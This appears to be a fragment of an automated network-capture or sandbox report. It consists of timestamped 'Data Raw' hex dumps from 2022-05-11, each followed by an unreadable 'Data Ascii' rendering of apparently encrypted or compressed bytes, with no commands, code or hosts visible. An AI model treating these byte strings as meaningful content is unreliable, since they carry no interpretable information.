                                            Data Ascii: zygt61$y`Qd|hKR JVWx~hb5?O[K!77%e|ZOZqW}3WXW%;,ju&3/G,N#hds7CPPs>nr)qnuI6M,Q(,no:pqeztEu%nmiZs/`f|}N&1jTf.Otm
                                            2022-05-11 11:28:18 UTC167INData Raw: f7 3a b1 fb 31 a4 ac cb 1c e2 1b 33 9b 75 24 c8 4f c1 87 8d 54 3d ce da 01 e8 a9 56 e3 a4 5c 60 0b f0 0f 99 ae e7 eb 49 cc 89 49 3a 59 bb 55 b0 56 a7 af ab e6 a7 b7 0d bb 93 dc 84 ee 6d 8e d8 7e 82 e6 7b d0 36 66 4e c2 58 97 3b 7c 98 ba d7 32 53 c7 1d 67 64 61 91 93 43 3f b0 f1 38 7e bd 94 27 9c 66 3e c6 56 1f e9 43 e8 76 59 61 ae 20 f1 93 25 1b c9 e5 06 32 08 ee c1 80 f0 92 cd de 59 5c fc 92 3c aa 2e 9c 61 17 6b 11 8c 6c 14 8c 44 ed 9a 90 db 14 8d 0c 45 82 22 8d ce ed 9b fa cd 2c 5c 4e 25 45 9b ab c9 be 29 8e 99 61 ca cf 37 dc c2 ce d4 a0 ce b6 f9 de f6 24 50 c9 6f 9f 28 eb b1 f0 0c e6 d9 03 e5 ac c3 a8 dd 06 0b 0e da 83 04 e8 1b 56 2c f0 c3 5b cc 63 02 41 2a ae e4 ef ea 83 57 88 d0 99 4e 68 3e a3 8b 1e de a6 fe ca 91 b9 5e 55 36 98 14 5c 0b c0 64 54 72
                                            Data Ascii: :13u$OT=V\`II:YUVm~{6fNX;|2SgdaC?8~'f>VCvYa %2Y\<.aklDE",\N%E)a7$Po(V,[cA*WNh>^U6\dTr
                                            2022-05-11 11:28:18 UTC168INData Raw: a4 e3 b4 8a 97 93 80 a8 78 31 b5 2d 6f a0 33 7f 0d db 2c 23 6e 5c f1 44 ff ef 9d 07 06 89 50 96 ee 73 90 d6 20 7b 3b e4 32 b7 f1 77 6e a5 2d 36 df 15 3f 23 18 e5 e1 dc 9f f6 af 3e 0a 3a 76 cb 0e de 28 34 c9 9a 9e ae 45 a2 75 25 68 6e 0a c3 38 de b6 22 8e cf da ff 5a bc 0d d3 bf dd ed 0c 28 5b be 5e 8e cb e3 7c c5 84 b1 ae 8f 92 5a be 24 ed b4 6a 54 66 18 2d 5b 0f d3 13 3c e5 7d b0 eb 94 4f 21 7b 02 81 c2 2f 40 e5 df ae 7e 23 7f f7 06 81 ee d3 ae 34 ed 32 9e f9 54 88 9b e2 5e 74 65 01 2a 47 bc 7d b6 58 12 27 86 ee 06 15 18 75 75 4a 68 89 20 8d ef 4e 58 90 ac d0 87 8f e4 25 6b 10 13 e0 cd bf fa b6 2d 28 f3 ae 5d 97 05 24 e4 a6 76 84 20 ff 62 87 d8 f8 90 d4 f9 dc f0 e4 d9 e2 f4 90 44 7b 74 a9 8d b2 4f dc e2 2a d1 81 e4 77 ee 83 4b 7b 53 9c 6b d9 06 f8 c4 22
                                            Data Ascii: x1-o3,#n\DPs {;2wn-6?#>:v(4Eu%hn8"Z([^|Z$jTf-[<}O!{/@~#42T^te*G}X'uuJh NX%k-(]$v bD{tO*wK{Sk"
                                            2022-05-11 11:28:18 UTC169INData Raw: df 59 5c fc 81 bc 2c 3a 79 b6 51 f5 0a bf 6d 14 8c 44 fe 1a cf df f1 5a 4a e1 e9 13 8c ce ed 9b e9 4d e0 4b ba fc 03 28 b4 f9 bf 29 8e 99 72 4a 7f 23 39 15 88 69 3f fe b7 f9 de f6 37 d0 6e 6b 21 f9 ad 75 43 3d e7 d9 03 e5 bf 43 5a c9 e3 dc 48 13 cc 3a e9 1b 56 2c e3 43 b4 c9 86 d5 07 f3 65 db ee ea 83 57 9b 50 85 5b 8d e9 e5 60 59 ec a7 fe ca 91 aa de a7 34 7d c3 1a f6 03 53 55 72 5e 25 31 d0 20 bb 35 c1 90 e1 f7 4f 09 75 e4 07 c7 b5 f4 21 38 95 d6 35 a0 13 12 f9 35 1b b5 67 62 a3 23 50 9f 03 b6 b9 4c ae 10 47 02 c6 70 34 ef f2 17 f5 db bd d8 f9 80 65 91 24 79 5f a7 fa d5 19 7d f6 c0 f2 56 7d a2 f2 ef 42 a2 f7 b6 bf 34 ca 24 17 ef 1d 82 fd dc 05 77 ab dd 30 57 b4 77 bf c5 3e ac e6 e4 07 a2 02 33 76 8b f0 39 b3 a2 13 56 79 55 8e 49 f9 85 26 f3 d3 59 e9 64
                                            Data Ascii: Y\,:yQmDZJMK()rJ#9i?7nk!uC=CZH:V,CeWP[`Y4}SUr^%1 5Ou!855gb#PLGp4e$y_}V}B4$w0Ww>3v9VyUI&Yd
                                            2022-05-11 11:28:18 UTC171INData Raw: 65 eb 87 4f ed 7c 81 26 83 ee e2 85 df 96 a8 23 79 ef 0c a6 fd 7f ef f6 c2 d9 9f 4d 76 88 88 e2 92 73 c1 08 4c 54 d4 94 b7 bc c4 27 95 ee ca 12 11 b2 33 a9 ca e9 20 99 37 4e 5e 88 a6 f0 94 43 a2 d7 29 fe 12 54 15 bf e9 b6 e1 28 dc 60 1b 96 6a cb e5 92 af 84 33 ff ae 87 bd 1c d6 c3 e2 30 f1 30 00 e2 e5 88 54 5b f2 65 cb 99 ec bd e2 7e 0b 81 e2 6f e4 a4 58 b7 15 d4 28 28 07 4c e6 22 15 44 0d f2 c6 b1 ff 5b 6c a4 b3 aa 42 b2 c3 25 30 a0 ee 72 60 f1 66 e0 4a 9b 55 f5 d6 77 6a f2 8f 3e 95 d7 11 02 45 ad 84 b3 c0 3b 94 f5 8d 34 f1 71 44 6b c2 38 a0 1a 92 a7 d8 8c 31 45 f3 93 66 97 a2 66 2b 3e fb 70 c4 5c 6d d6 c2 b5 99 84 e2 62 8d 82 24 19 d5 0c 9d 72 d9 c4 fe 57 99 e5 3a 71 63 31 68 ad d3 16 a5 d7 2a ef 77 36 c8 13 5a 87 41 55 0c e6 9d de 3a 4d 53 f1 a4 e8 43
                                            Data Ascii: eO|&#yMvsLT'3 7N^C)T(`j300T[e~oX((L"D[lB%0r`fJUwj>E;4qDk81Eff+>p\mb$rW:qc1h*w6ZAU:MSC
                                            2022-05-11 11:28:18 UTC172INData Raw: e4 5e a5 26 e5 72 e8 f0 8c 2f e0 a7 65 08 e3 e4 aa c9 80 d9 64 fd fc 69 34 74 39 13 6f 35 b1 a2 52 1a f0 e6 c5 20 02 ee 92 4d 38 10 90 0c f3 2b 71 2a 43 a8 f4 07 96 d9 6f 80 b1 86 11 df 0c 62 27 6a 18 a9 d8 c1 64 56 1f 90 c7 2a 07 67 0e 09 be 18 f8 25 81 ef 18 94 c8 10 56 b2 4e 62 31 e7 86 76 29 c5 b1 99 d3 7b 40 67 03 8d 77 37 c5 38 25 a2 3c 40 4c af dd 8c d4 3b 27 f3 eb 58 7f 64 8e 34 5d f7 1b a3 06 c1 df d3 59 c7 1a c6 0f 09 62 7a 1b 8e 1c 30 27 0e aa 77 f6 80 42 48 e5 37 d8 3f 56 41 4d 5a 36 14 d5 b9 64 24 02 da dc f2 36 29 c0 a8 4b 3e bb 65 c4 e1 e7 82 5c f6 52 75 97 4e 6a 53 ef 57 84 f5 48 a8 c5 0f ff 70 9a 59 54 a2 c9 25 d5 ce d7 39 be df cf 09 07 e5 55 a4 75 b4 79 12 a6 94 d8 b4 20 c1 3a 2e a0 f8 38 0d 88 00 16 6a 14 fb 4e c5 ee dc 07 da ce 50 8c
                                            Data Ascii: ^&r/edi4t9o5R M8+q*Cob'jdV*g%VNb1v){@gw78%<@L;'Xd4]Ybz0'wBH7?VAMZ6d$6)K>e\RuNjSWHpYT%9Uuy :.8jNP
                                            2022-05-11 11:28:18 UTC173INData Raw: 13 13 71 c3 a3 57 cb ba 59 2c 10 b2 3c 42 ce d1 10 fe f1 52 1c 25 f3 fe 54 4b 0d 55 ae d0 42 a4 a3 36 9e d0 d5 8d b7 44 3b 84 15 d2 0e 5a a4 4c bf b4 73 f0 49 c2 ae a0 d3 81 8a d0 fd 22 fa b6 91 ba 22 a3 f0 2b ee e9 45 0a 0d bd 1f 87 b7 f1 32 e3 f4 8d 1d 20 2c 1b 5d a4 73 9d c6 82 ee 98 73 3a 8b 61 04 a6 fc cb 39 e1 d5 32 55 76 a0 c8 c9 43 b2 8f 04 3d 8a d9 dc ee f6 52 67 a4 cc 46 3e f2 5f 99 ce fc e3 68 df 89 cd 3a 98 3b 60 b2 06 a7 6e aa 4a b4 fe 0c 3f 93 14 1c db 6f de d8 c7 99 f4 5a 56 36 e2 4e b9 45 a2 39 ac 98 65 f4 fc 52 4c 12 e3 64 e3 95 a6 41 ef b0 0d 1b b0 bc 1b 28 18 66 91 db 63 1d 39 43 f2 52 97 60 a4 2a 75 93 89 1f fc e7 d6 32 33 ca 0f 81 68 9d 49 de 80 41 c9 90 ec aa 76 b8 af 16 f5 1e 08 6c c2 88 71 ef 4a 90 bd 30 43 0d e1 8d a6 8d aa cc ae
                                            Data Ascii: qWY,<BR%TKUB6D;ZLsI""+E2 ,]ss:a92UvC=RgF>_h:;`nJ?oZV6NE9eRLdA(fc9CR`*u23hIAvlqJ0C
                                            2022-05-11 11:28:18 UTC174INData Raw: 51 45 4e 68 9f 45 a1 54 38 de 45 59 48 85 f3 54 5c 57 f3 45 8c 71 c9 26 98 aa fc 62 b5 b3 32 d0 85 86 3d de b8 4c cc 36 70 51 8c f7 71 37 09 82 f0 92 d0 c1 3e 4b 8b 2f 50 82 9a d2 72 02 f4 ed 8c 96 d8 6a ff 6b 62 4a a0 7d b9 9a 0d 25 89 9b cf 54 55 5d 10 70 b5 e2 0e e1 dd 3a f0 06 73 55 50 f0 81 88 47 93 c1 87 b6 30 3b 3b b8 a0 d9 ad 38 d9 7c 23 11 4b f9 65 3f ef 4a 07 2d 4c 65 94 be 73 0d d1 3c 6f 72 e5 e6 b7 8c a6 5b a7 7d 36 65 12 4f 2a 51 e4 35 dc c7 31 9a 3c 5a 3a ad cc 73 d7 e8 34 1d 9a 05 7f 70 a0 25 25 91 61 c4 c2 f6 dd 62 22 58 09 ef fd 0a bc 2c c3 71 dc 2c 1a fc 5b 2f 89 bb c9 b3 7c 82 94 7f af 4d 91 8e be 0c 2c 81 68 04 66 7d 3d f5 09 1d 10 e8 e5 26 66 de 96 1f 21 f9 12 2f c4 ee 56 31 df 34 bf 16 7d a7 06 21 fe 7d a8 f6 ee e6 9e b0 75 bd 99 b2
                                            Data Ascii: QENhET8EYHT\WEq&b2=L6pQq7>K/PrjkbJ}%TU]p:sUPG0;;8|#Ke?J-Les<or[}6eO*Q51<Z:s4p%%ab"X,q,[/|M,hf}=&f!/V14}!}u
                                            2022-05-11 11:28:18 UTC176INData Raw: 12 0b 69 15 9b a8 ff e1 fe df bd 5d 0f 07 77 55 0b 4c a5 e9 a9 48 22 fe bc 87 a6 4e 48 ee b0 94 da 6f 9a f6 cc 56 b2 75 7b c0 08 97 c5 e6 9a ac f7 fe c4 4c 43 73 51 63 c1 93 63 a4 b2 e7 18 b2 2a 1b fc 8f 53 3c 96 56 5e 72 41 fe 56 95 f6 a4 9e e5 a6 27 4b c9 86 9d 30 1e ce 0d 17 68 9e dd eb 5b 0c fc 17 a7 a8 38 bc ad 80 f5 f9 98 59 16 dc 44 4a 01 92 cd 34 41 9b e1 a0 32 b8 cc bd 9b 32 56 2e 4a 6e e9 d2 28 d9 da 8b 2b de 99 8b 51 cd 21 fc 0e 59 69 cb da 83 fb 8e f6 28 cc cb 79 bf e4 7c 75 6d 13 d3 db 53 e5 82 5f aa cb 26 c7 99 13 02 10 dd 19 06 2c a0 5f 59 da 43 ce d6 f3 c6 e1 da e8 d3 57 fa 4c 9b 58 48 f2 34 60 a9 c7 93 fc 9a 91 2a c2 57 20 b8 d8 cb f6 60 68 61 70 0e 25 97 cc 72 b8 f0 da 41 e1 5d 67 3d 77 b4 07 02 a9 d9 34 fd 8e 07 35 83 2a 26 fb 65 1b 5e
                                            Data Ascii: i]wULH"NHoVu{LCsQcc*S<V^rAV'K0h[8YDJ4A22V.Jn(+Q!Yi(y|umS_&,_YCWLXH4`*W `hap%rA]g=w45*&e^
                                            2022-05-11 11:28:18 UTC177INData Raw: 4c c8 71 96 de 3e f9 72 2e 57 82 db f5 6e 5e 0b 34 d9 1d 4d bc 51 ab a6 e9 f1 74 af 23 2d 38 70 c3 71 41 e8 dd a1 af 78 2c 45 9d 52 27 6e 6e c6 54 f6 5a f1 17 04 4c da 9e 7d be 0c d3 73 4a 2c 20 41 6e 84 da 8e 48 c4 7e c3 84 7d 39 4d 20 1d 8b c2 69 b4 ce 73 64 1e 2d f7 9f 1d 71 55 d0 f7 35 eb 52 68 23 7d 02 2d 52 ee bf a2 ea 94 f8 23 97 d0 04 87 ee 7f 3e f6 dd 5c ab 4f 26 88 92 ca 5c 72 7d 0b 9d 54 ac 39 83 be 94 27 ad c6 04 13 18 b9 e2 a9 cc e7 15 9b 67 4e 14 b8 ae d1 87 43 73 d7 4a 54 26 56 45 bf 94 9e 2f 29 f3 62 ca 96 a1 48 d1 90 ff 84 b0 d7 60 86 d8 34 07 c3 69 9f c5 32 50 e2 46 b8 46 7a 74 65 1a 99 0c 99 d7 7c 5b 81 30 5f ec 85 4b b7 c4 d4 ab 9b 33 4e b6 22 f0 6c c3 f3 57 99 2e 5b 9b 16 87 a8 12 b2 ca 0c fe a1 52 71 b1 f1 f8 56 7e 99 05 f5 ff 5e a4
                                            Data Ascii: Lq>r.Wn^4MQt#-8pqAx,ER'nnTZL}sJ, AnH~}9M isd-qU5Rh#}-R#>\O&\r}T9'gNCsJT&VE/)bH`4i2PFFzte|[0_K3N"lW.[RqV~^
                                            2022-05-11 11:28:18 UTC178INData Raw: 22 6a 6f 34 44 43 6d d8 23 37 d8 8c 64 92 ea c4 9d 49 6e 2d 93 ad c8 d2 80 0c 60 ed 58 bc 7b 68 03 79 40 66 f2 7d aa 95 99 25 ed 9e 6c 56 f2 5f 1d 5c e7 e2 3b ee 49 3a 0e 2c d0 57 f4 e3 ee a4 15 93 96 88 22 30 a7 3e 1b a2 a8 ae 71 f5 2e 23 68 44 6d 65 70 c4 e9 05 8a 58 ce b8 ec 73 96 de a8 6f a5 e0 45 b5 89 a5 ae 8b 2f 36 d9 1d db 2a 71 c8 96 de a3 24 4e 10 08 3a 70 c3 e7 d7 16 31 be 98 2a 7c 47 8d 77 25 6e 6e 50 c2 a8 f1 c1 20 56 1c f9 d0 58 bc 0c d3 e5 dc 09 1c 5f 59 d6 8a ca e4 e1 7c c3 84 eb af ec bf 2d bc 90 39 d2 45 56 66 1e 2d 61 09 b2 11 4b e7 a5 65 63 bb 4d 21 7d 02 bb c4 82 50 92 dd c6 a8 89 50 f5 06 87 ee e9 a8 19 ef 45 9c 1d 76 43 b4 e0 5e 72 7d 9d 0b 9b ba 0a b4 ec c4 ca a9 ec 06 13 18 2f 74 b7 7c fe 22 c9 37 41 68 92 ac d1 87 d5 e5 d5 7a 67
                                            Data Ascii: "jo4DCm#7dIn-`X{hy@f}%lV_\;I:,W"0>q.#hDmepXsoE/6*q$N:p1*|Gw%nnP VX_Y|-9EVf-aKecM!}PPEvC^r}/t|"7Ahzg
                                            2022-05-11 11:28:18 UTC179INData Raw: 6f 54 66 74 b3 fb 5a 97 3b fc 0e ac 5e e2 67 4e 42 75 7a 5b 93 93 43 bf 26 e7 7c b6 89 19 78 8e 59 04 c4 56 1f 69 d5 fe d1 88 55 a6 7a e3 f2 1f 19 c9 e5 86 a4 1e 40 09 b4 6a cd df 5c 63 5e fc 92 bc 3c 38 07 b0 23 f7 4e 9e cf 2e 8e 44 ed 1a 06 cd 8c 45 38 e3 dd 30 49 f4 ef 9b fa 4d ba 4a 8b f4 71 2a f4 dd 5b 13 8c 99 61 4a 59 21 15 0a fa 6b ff d8 b1 c2 dc f6 24 d0 5f 79 cf c5 df 77 af 1a ce e2 01 e5 ac 43 3e cb 35 c2 3a 11 dc 12 a1 20 54 2c f0 43 cd da de e8 75 f1 f1 f3 84 d1 81 57 88 50 0f 58 75 f7 97 62 41 c5 2a c5 c8 91 b9 de c3 20 6f f2 68 f4 9f 7a fa 49 5c 25 22 d0 e6 b8 97 df e2 e3 f7 65 c7 4e e6 07 d4 b5 4d 34 fc a5 a4 37 24 39 e2 c2 37 1b a6 67 8e a0 79 4e ed 01 be 92 5e 92 12 47 11 c6 bf 21 78 c2 65 f7 57 96 ed c5 82 65 82 24 4b 5c b8 e4 a7 1b f9
                                            Data Ascii: oTftZ;^gNBuz[C&|xYViUz@j\c^<8#N.DE80IMJq*[aJY!k$_ywC>5: T,CuWPXubA* ohzI\%"eNM47$97gyN^G!xeWe$K\
                                            2022-05-11 11:28:18 UTC180INData Raw: 64 8b a9 3c 7e 45 a2 75 b3 6e 0f c5 f7 f4 8d f4 77 40 1e da ff 5a 2a 0c 93 66 e9 2e 4a 6a 2c c0 88 8e cb e3 ea c3 0f 7e 9a 4f c1 18 26 86 3b b4 6a 54 f0 1e 47 e2 3c 1f 40 7e 5f b3 67 eb 94 4f b7 7d b7 2e f1 ec 06 a7 03 d0 aa 23 7f f7 90 87 36 6a 9d f4 be 70 60 0b 74 88 9b e2 c8 72 a2 08 3e 56 ec 3f 96 fb c6 27 86 ee 90 13 b6 ae 41 ab 2e cb 61 de 35 4e 58 90 3a d1 8e 47 d0 d5 2d 52 70 13 17 bf fa b6 bb 29 1a 7a 69 94 42 66 60 d5 ad 84 20 ff f4 86 eb 30 a4 c1 be 9e 55 77 02 e2 f4 90 d2 7a d8 79 b9 9b 08 9f 25 39 09 81 e4 77 78 85 2c b3 67 d6 2c 9a ef 0b e4 22 06 44 57 f3 dd 84 8d 59 7c 10 b8 e2 40 b2 d2 25 6a a1 c3 75 12 f3 ae 54 60 d3 57 f5 c5 77 30 f3 88 0b e7 d5 dd b7 09 e5 86 b3 d1 3b ce f4 f7 18 83 73 a0 49 ad 70 a2 1a 94 bf 44 ad ca 58 81 91 ea 22 33
                                            Data Ascii: d<~Eunw@Z*f.Jj,~O&;jTG<@~_gO}.#6jp`tr>V?'A.a5NX:G-Rp)ziBf` 0Uwzy%9wx,g,"DWY|@%juT`Ww0;sIpDX"3
                                            2022-05-11 11:28:18 UTC181INData Raw: 1e ad 18 e6 d9 03 73 ac ca af fe 24 97 0f 9f de 10 e8 1b 56 ba f0 33 59 ef 41 9e 40 5e f3 f1 ef ea 83 c1 88 ce 90 6d 4a a2 a2 ae 43 c7 a6 fe ca 07 b9 44 57 15 ba 88 5d 19 9d 78 54 72 5e b3 22 a3 62 8d f2 8a d7 f1 f4 67 08 75 e4 91 d4 71 d9 01 ff de 91 04 27 3b 13 f9 35 8d a6 dc 0a 95 e4 1b d8 51 bd 90 4d ae 10 d1 11 c0 2a 14 28 b9 50 86 54 94 d9 f9 80 f3 82 27 c9 69 60 b1 92 8d fa da c1 f2 56 eb b1 c2 2b 62 65 bc f1 0a 4b fa 25 17 ef 8b 91 fb 07 33 b0 e0 9a e6 b4 84 76 bf c5 a8 bf 82 7a 25 65 49 74 8e 64 c7 38 b3 a2 85 45 3a b8 b8 8e b2 c2 3f a7 e9 58 e9 64 d1 1e e6 f6 7e a1 04 38 e5 87 5b c7 8c c6 c0 0c 3a 6d 7e 8c 21 c9 7b 5a a8 77 60 80 27 62 68 36 bd 3d 8e b8 32 0e 34 14 43 b9 63 21 ec cd b9 f0 c2 d0 5e fc 49 3e 2d 65 16 ca 30 83 39 f4 bd 8c 56 1a 68
                                            Data Ascii: s$V3YA@^mJCDW]xTr^"bguq';5QM*(PT'i`V+beK%3vz%eItd8E:?Xd~8[:m~!{Zw`'bh6=24Cc!^I>-e09Vh
                                            2022-05-11 11:28:18 UTC183INData Raw: 0e 11 ad 15 22 da 30 2d 28 f2 21 43 f4 10 6f e5 32 bc e9 22 ee 63 8a f8 40 93 02 ee ba de 3f 02 f3 f5 d7 6c 01 76 44 8d ef 4a 12 e0 af 0b ae cd ee ec ac 4a 8f 5b 49 7e ab 07 29 f2 17 04 7d c0 71 7e 3b ba 12 2d 61 94 68 40 fb d3 e5 d1 66 50 28 26 80 d8 96 49 aa 54 ac d1 5d a4 ca 37 5e f1 19 8f 8e 45 68 8f 66 d3 5a 59 1f 47 55 b7 48 f1 14 d5 2b a0 43 95 b8 dd 76 20 1c b5 30 97 c2 a1 3f 2a 4b c9 97 0a 2c bc 42 9a 5a f3 73 e2 a7 a1 76 35 58 18 9e b5 8c 9c 85 83 47 96 f6 3a f8 63 4e 88 1b c8 8c e3 91 21 e9 75 f7 c8 b4 52 45 8e d5 3c a2 f1 16 ed 77 53 5f b7 26 41 ca f0 a9 bf 7b fc 20 68 79 af 82 39 5c 26 d5 9a 7c a5 70 a8 1d a7 d4 0e 08 92 20 19 1f 6e 2f d9 dc b9 01 59 0f 37 f8 64 3f 5b 3e 3a 7e b1 bf f7 4f 53 46 33 3e 66 c8 90 99 62 b5 b4 a3 18 b8 9d 08 28 c2
                                            Data Ascii: "0-(!Co2"c@?lvDJJ[I~)}q~;-ah@fP(&IT]7^EhfZYGUH+Cv 0?*K,BZsv5XG:cN!uRE<wS_&A{ hy9\&|p n/Y7d?[>:~OSF3>fb(
                                            2022-05-11 11:28:18 UTC184INData Raw: 68 d8 48 e6 78 7c 70 f2 e9 44 39 e5 30 bf d9 eb 41 1e c6 1d f4 f4 7b 0f fb b4 e5 2c b8 82 3f bb 9b 22 e0 e2 20 14 c9 0a 3d 77 7e c1 bc a6 fd 17 0c 7d c3 91 d3 e6 fb 22 dd c3 de e0 5d 43 68 75 15 43 c2 50 4d d3 06 50 a6 88 15 47 d9 5e 41 4b 8d 7f f6 27 2f ab 4f 6e 7d b8 5b d4 c7 a5 3b d4 81 48 74 1e 1e 49 80 f4 c6 12 c6 86 93 93 e3 cd e1 4a 07 29 9b ad ce d8 b9 0c a7 ff 9f 96 3f 6e 59 58 44 48 d9 7d fd 9c 94 2f 18 9f ec 7e eb 5e bc 76 ef c3 28 ee 7e 3e fa 27 f6 55 3d e7 c1 81 aa 99 0f 8c a8 3b 21 32 b7 a4 ab a9 c6 d1 85 27 41 5c e1 6c 96 eb e8 1f c0 51 f9 92 07 60 b8 df 8f 6b 35 eb 9f bd 18 a5 d1 83 d8 3c 18 19 47 0b 91 e4 da dd 49 2a 51 34 1b 3e 6c ca 69 dc f9 30 a1 93 62 77 94 a6 7f 04 ae 6e bf c1 b7 c1 de 20 df 18 ec d3 9f b8 fd d2 79 fd ec 1a ab 5b 28
                                            Data Ascii: hHx|pD90A{,?" =w~}"]ChuCPMPG^AK'/On}[;HtIJ)?nYXDH}/~^v(~>'U=;!2'A\lQ`k5<GI*Q4>li0bwn y[(
                                            2022-05-11 11:28:18 UTC185INData Raw: a9 47 38 3e 33 75 02 7c ae fe 0c b6 e6 20 cd 63 11 82 e1 1e 2f 1b b5 74 3d e9 d4 f8 c1 e4 ac 52 6b 3a 95 aa c1 3c 22 d7 03 53 ff 22 e6 15 02 86 ae 59 05 c2 e3 d8 e4 d7 41 f1 e5 ee 48 2a e3 0f 98 ae d0 c0 15 ca 88 5d cd 18 34 55 39 55 50 f4 ba 48 25 ff 39 ba 9a 47 51 e8 67 af 18 6f cb f0 50 77 25 74 8f c2 1e b2 59 eb 19 ae 19 d9 35 5b b6 75 41 48 bf 92 e7 bf e2 ff 18 be 18 1b fe 89 3f 3a 62 56 15 48 50 fe 87 94 cd 82 7d fb 42 24 92 dd cb 87 e3 1f 1d 1c de 70 39 df 2c 79 63 f8 3e bc 56 10 2c ad ba f5 75 b4 33 10 d5 40 81 3e b4 cc 1d 47 b0 cd 16 34 84 cf d7 bc 8e 4b 2d 4b 04 f8 a6 30 2d de 91 3d 0d 8c 40 4e 36 39 ea 0c 96 6f 67 d6 b5 e0 37 f6 8a c3 80 78 56 e4 e0 54 3f 1a e7 df b6 c9 1b 40 a9 cd 56 c2 b8 10 ed 14 e2 3a 96 2c 44 43 97 db a3 cf f4 f3 6d f2 75
                                            Data Ascii: G8>3u| c/t=Rk:<"S"YAH*]4U9UPH%9GQgoPw%tY5[uAH?:bVHP}B$p9,yc>V,u3@>G4K-K0-=@N69og7xVT?@V:,DCmu
                                            2022-05-11 11:28:18 UTC187INData Raw: 76 5b 98 53 ff e8 57 a8 94 0a ac 9d b5 5f 55 a7 e0 22 ba ee 6b 3c 98 c2 b8 d9 5a e4 5f 85 f0 b4 ee 16 99 b7 9b b4 69 3a 80 29 db d2 d7 08 64 3b cc 6c 3d fe 04 2e 6d f6 5b db 8e 57 cf ea 2f 97 a1 12 0c 76 81 71 92 f0 8b 6f b4 29 e6 f0 9b 67 46 50 ee 82 ea e5 40 ae e8 0d 63 74 d2 75 17 e6 a2 a1 03 7d 76 64 b1 75 84 69 64 e7 d1 f6 b9 f5 d0 26 23 de 8b 5b 40 24 43 73 d5 2d 9f 7c 54 8a 83 8f 17 c5 08 c5 f0 7c c4 67 ce 1c 6f c3 9e bd 53 56 8f 1d 7f ef c7 36 b9 79 ef d4 78 c7 3d 48 b5 76 e2 25 75 e9 5c 86 ec ba 61 24 75 d6 15 87 1a 7f a2 d7 fd 70 6f 4c 3d 85 d2 e3 aa 72 73 26 5b 5a 48 3f 60 bb f2 31 1a ee 5d 0b 2e af 85 a8 90 dc 7f 9d 56 4e 37 bc d3 fd 5e 44 ef f6 98 56 f2 53 1f 9e e9 b6 c4 2e f9 43 9c 96 1c 66 ed 92 af 84 32 ff 6f 86 5b 31 99 c3 ff 9e 73 35 0e
                                            Data Ascii: v[SW_U"k<Z_i:)d;l=.m[W/vqo)gFP@ctu}vduid&#[@$Cs-|T|goSV6yx=Hv%u\a$upoL=rs&[ZH?`1].VN7^DVS.Cf2o[1s5
                                            2022-05-11 11:28:18 UTC188INData Raw: a7 65 7d d6 55 1d 20 40 bd 46 96 62 67 29 98 93 60 1b aa e0 fd 32 5b ce 8c 84 b3 9a 0c d6 fa 5a 87 92 f9 aa 3b b4 4e 1e b0 1e bd 64 6f 8c 01 ed 7e 98 4e 3b 04 0d 00 85 eb 8a be e7 b8 f6 fe 3a 0f 6e e9 6f a3 b5 98 be 49 b0 32 77 77 e3 a1 c2 a5 d9 23 83 fd b6 57 d1 d1 24 61 c6 52 bf 55 e5 58 ff cd e9 f6 03 0c a3 72 a8 22 29 f4 0f fa 83 27 e8 f2 59 1b f0 aa 54 e3 43 27 4f c8 a1 1a e0 d7 83 be 87 6f 99 54 58 b3 a2 6c 01 86 a6 f0 da d8 b9 09 5a 6b b8 0f 52 bb cf ad 5b 3d 5e f2 2d 81 70 6f ff 32 d7 50 a8 8f 08 c4 eb f1 d4 70 cb 68 fc 59 9e b5 75 ee 1c f8 35 b2 8b 67 18 c4 e6 4b d8 03 ee 3e 4d a6 10 47 11 6b 29 ab 2a 73 50 50 07 26 d9 e3 81 4c 83 16 dc 18 63 ac 93 70 a8 3c c0 d2 54 3d b3 95 2a df 65 45 f3 10 1b 10 26 14 eb 0c 95 94 16 88 b6 11 9e 27 e2 0e 73 6b
                                            Data Ascii: e}U @Fbg)`2[Z;Ndo~N;:noI2ww#W$aRUXr")'YTC'OoTXlZkR[=^-po2PphYu5gK>MGk)*sPP&Lcp<T=*eE&'sk
                                            2022-05-11 11:28:18 UTC189INData Raw: 3c 8b c9 c8 d3 7c 29 85 cf ae 6b 86 84 be 43 39 e6 7d 4f 71 10 3a c9 1e 2c 07 36 f2 8f 65 81 94 3e 21 05 02 52 c4 bd 57 48 de 60 a9 0c 7b c1 02 ce ea 1f ad 6a e6 81 95 5b 7a 4f 97 aa 50 6d 6e da 18 b7 a8 ee a1 db dc 85 9f 01 1f 10 02 34 6f 32 65 64 3b d7 2b 73 46 d7 b2 84 99 20 fb a6 63 29 0d c5 0b 18 e4 fb 09 72 d7 ec 74 18 3b df cd 2c 86 e3 0a 91 48 08 f2 b3 ba c5 ed 0b f0 c6 2b e7 f4 96 47 ed 74 62 a0 9c 58 99 e1 e7 0b 63 cf 72 ee 85 4a 2c 52 91 77 9c 06 0a e7 e9 06 1f e1 f1 57 df b9 96 2c 66 ab a8 42 f4 d3 ea fc 27 58 73 27 f1 ff 07 4a ee 7e f4 c5 77 a7 a6 37 ab f8 d6 8d f1 45 fa 85 71 c5 3a 58 f4 4d 45 b7 90 fe 48 c2 38 a1 41 95 63 fe ac 22 45 b5 ce bb 2e 80 61 2b 3e eb 2f 09 e3 96 f9 85 f6 f0 53 e2 f1 8a 83 37 5a 18 6e a5 5b b4 c6 82 ad 99 80 3b c3
                                            Data Ascii: <|)kC9}Oq:,6e>!RWH`{j[zOPmn4o2ed;+sF c)rt;,H+GtbXcrJ,RwW,fB'Xs'J~w7Eq:XMEH8Ac"E.a+>/S7Zn[;
                                            2022-05-11 11:28:18 UTC190INData Raw: dc d8 83 30 ed 24 c6 0d 7a f2 d1 05 65 9a f3 cc ca da dc a7 03 41 d4 ad 38 a6 ae 13 26 12 6c 25 66 b9 13 cc 99 b5 b9 80 d5 1c 68 47 e4 66 b4 86 db 60 92 db d8 5b 00 0f 27 f9 67 7e c7 03 51 ce 92 7d ec 03 ba fd 04 c0 64 71 25 c6 6a 65 6e d8 15 b7 3f d3 f4 cb c1 26 c6 09 e9 1d 53 d4 bf 20 e8 ea f3 df 61 44 83 c0 18 16 21 a9 c5 89 28 cd 25 5a ab 28 91 af 77 67 d6 e5 d3 5e 93 b7 40 bf 91 51 ea af 17 64 56 2f 74 24 52 a4 5c fa cc 67 74 4f ad d9 e3 ab ac 52 c2 dd 58 a1 29 06 5d 3b bd 0a 91 61 0e de b4 3c b3 d3 93 02 4a 6f 78 77 c3 1e ad 53 62 cf 49 60 c2 f0 62 93 74 88 7b 9f b8 09 1b 36 52 02 b9 b2 60 37 90 cd f2 f3 91 c1 ca 0a 3e 4e 24 80 ae 